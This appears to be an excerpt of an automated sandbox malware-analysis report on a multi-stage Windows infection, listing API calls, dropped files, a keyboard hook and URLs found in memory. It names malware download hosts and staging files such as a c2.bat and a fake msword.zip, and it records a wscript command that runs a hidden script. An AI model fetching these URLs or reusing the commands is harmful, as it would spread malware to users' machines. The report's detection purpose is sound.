Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E4A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	36_2_00E4A570
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E466DC FindFirstFileW,FindNextFileW,FindClose,	36_2_00E466DC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E0C622 FindFirstFileExW,	36_2_00E0C622
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E473D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	36_2_00E473D4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E47333 FindFirstFileW,FindClose,	36_2_00E47333
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E3D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	36_2_00E3D921
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E3DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	36_2_00E3DC54
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A8A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_00A8A087
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A8A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_00A8A1E2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A7E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	38_2_00A7E472
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A8A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	38_2_00A8A570
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A866DC FindFirstFileW,FindNextFileW,FindClose,	38_2_00A866DC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A4C622 FindFirstFileExW,	38_2_00A4C622
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A873D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	38_2_00A873D4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A87333 FindFirstFileW,FindClose,	38_2_00A87333
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A7D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_00A7D921
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A7DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_00A7DC54

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View	IP Address: 193.26.115.39 193.26.115.39

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00E4D889 InternetReadFile,SetEvent,GetLastError,SetEvent,

36_2_00E4D889

Source: msword.exe.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: msword.exe.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: msword.exe.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: msword.exe.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000002.00000002.1684264668.000000000509C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://candwfarmsllc.com
Source: Propose.com, 0000001C.00000003.2062709786.00000000039DC000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Propose.com, 0000001C.00000003.2062709786.00000000039DC000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Propose.com, 0000001C.00000003.2062709786.00000000039DC000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Propose.com, 0000001C.00000003.2062709786.00000000039DC000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Propose.com, 0000001C.00000003.2062709786.00000000039DC000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: msword.exe.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: msword.exe.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: msword.exe.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: msword.exe.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: msword.exe.12.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: msword.exe, 00000010.00000000.2005722687.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe, 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe.12.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.1687520157.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: msword.exe.12.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: msword.exe.12.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: msword.exe.12.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: msword.exe.12.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Propose.com, 0000001C.00000003.2062709786.00000000039DC000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Propose.com, 0000001C.00000003.2062709786.00000000039DC000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Propose.com, 0000001C.00000003.2062709786.00000000039DC000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Propose.com, 0000001C.00000003.2062709786.00000000039DC000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000002.00000002.1684264668.0000000004E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1684264668.0000000004D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Propose.com, 0000001C.00000003.2062709786.00000000039DC000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Propose.com, 0000001C.00000003.2062709786.00000000039DC000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 00000002.00000002.1684264668.0000000004E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Propose.com, 0000001C.00000003.2062709786.00000000039DC000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000000.2055666013.0000000000AD5000.00000002.00000001.01000000.00000010.sdmp, LinkHub.com, 00000024.00000000.2076341053.0000000000EA5000.00000002.00000001.01000000.00000012.sdmp, LinkHub.com, 00000026.00000002.2215592158.0000000000AE5000.00000002.00000001.01000000.00000012.sdmp, LinkHub.com.28.dr, Clinton.24.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: msword.exe.12.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000002.00000002.1680770747.0000000002A6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coa
Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000002.00000002.1684264668.0000000004D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: mshta.exe, 00000000.00000002.1696324768.0000000003095000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1684264668.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://candwfarmsllc.com
Source: powershell.exe, 00000002.00000002.1680770747.0000000002A30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1682926508.0000000002DB0000.00000004.00000020.00020000.00000000.sdmp, c.hta	String found in binary or memory: https://candwfarmsllc.com/c2.bat
Source: powershell.exe, 00000002.00000002.1687520157.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1687520157.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1687520157.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1684264668.0000000004E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: cmd.exe, 00000004.00000003.2005828687.0000000002A45000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2006995200.0000000002A5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.c
Source: powershell.exe, 00000002.00000002.1684264668.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1684264668.00000000050BD000.00000004.00000800.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2024952117.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2025460494.0000000002290000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2025541625.0000000002480000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2043113864.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2042155343.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2042892324.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2043569674.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2043809738.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2043942387.0000000003080000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2047509229.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2047279430.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2047975980.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2047866470.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2048091220.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.2051819548.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.2051485159.0000000000650000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2107238791.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2107396862.0000000003070000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2063550704.0000000002F30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdf
Source: cmd.exe, 0000001E.00000002.2063550704.0000000002F30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdf8
Source: cmd.exe, 00000004.00000002.2006995200.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLR
Source: tasklist.exe, 00000015.00000002.2047866470.00000000009C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLRWUSERD
Source: cmd.exe, 00000004.00000003.2005828687.0000000002A45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLRWUSERDOMAIN
Source: msword.exe, 00000010.00000002.2024952117.00000000006AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdfl
Source: extrac32.exe, 00000018.00000002.2051819548.00000000029C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdfqH
Source: choice.exe, 0000001D.00000002.2107238791.0000000002E48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdfxS
Source: tasklist.exe, 00000013.00000003.2042155343.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2042892324.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2043831819.0000000002DF3000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2043033027.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/mB
Source: cmd.exe, 00000004.00000002.2006995200.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.2005828687.0000000002A45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zi
Source: cmd.exe, 00000004.00000003.1703265589.0000000002A92000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1680124265.0000000002A2D000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2024952117.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2025460494.0000000002290000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2025541625.0000000002480000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2043113864.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2042155343.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2042892324.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2043569674.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2043809738.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2043942387.0000000003080000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2047509229.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2047279430.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2047975980.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2047866470.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2048091220.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.2051819548.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.2051485159.0000000000650000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2107238791.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2107396862.0000000003070000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2063550704.0000000002F30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zip
Source: cmd.exe, 0000001E.00000002.2063550704.0000000002F30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zip:
Source: tasklist.exe, 00000015.00000003.2047509229.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2047279430.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2048091220.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipi
Source: msword.exe, 00000010.00000002.2024952117.00000000006AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipj
Source: extrac32.exe, 00000018.00000002.2051819548.00000000029C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipsH
Source: cmd.exe, 00000004.00000002.2006995200.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.2005828687.0000000002A45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipurl2=h
Source: cmd.exe, 00000004.00000003.2005828687.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSE
Source: Propose.com, 0000001C.00000003.2062260353.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2063420567.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2062013078.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2062038789.00000000009F5000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2062103447.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2063477046.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2062147909.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2062060275.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2062081491.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2062125358.00000000009F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLRWUSERDOMAIN_ROA
Source: cmd.exe, 00000021.00000002.2064562802.0000000002930000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLRWUSERDOMAIN_ROAMINGP
Source: choice.exe, 0000001D.00000002.2107238791.0000000002E48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipzS
Source: powershell.exe, 00000002.00000002.1687520157.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Propose.com, 0000001C.00000003.2062709786.00000000039DC000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: LinkHub.com.28.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 16_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

16_2_004050CD

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E4F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		36_2_00E4F7C7
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A8F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		38_2_00A8F7C7

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00E4F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

36_2_00E4F55C

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 16_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

16_2_004044A5

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E69FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		36_2_00E69FD2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00AA9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		38_2_00AA9FD2

System Summary

Drops large PE files

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File dump: msword.exe.12.dr 597659152

Jump to dropped file

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00E44763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

36_2_00E44763

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00E31B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

36_2_00E31B4D

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 16_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,	16_2_00403883
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E3F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	36_2_00E3F20D
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A7F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	38_2_00A7F20D

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\EquationsHighlights
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\OurProperty
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\ItemAnytime
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\ExpenditureBlood
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\DentalSubtle

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04607E8C	2_2_04607E8C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04608A48	2_2_04608A48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0460950E	2_2_0460950E
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 16_2_0040497C	16_2_0040497C
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 16_2_00406ED2	16_2_00406ED2
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 16_2_004074BB	16_2_004074BB
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DF8017	36_2_00DF8017
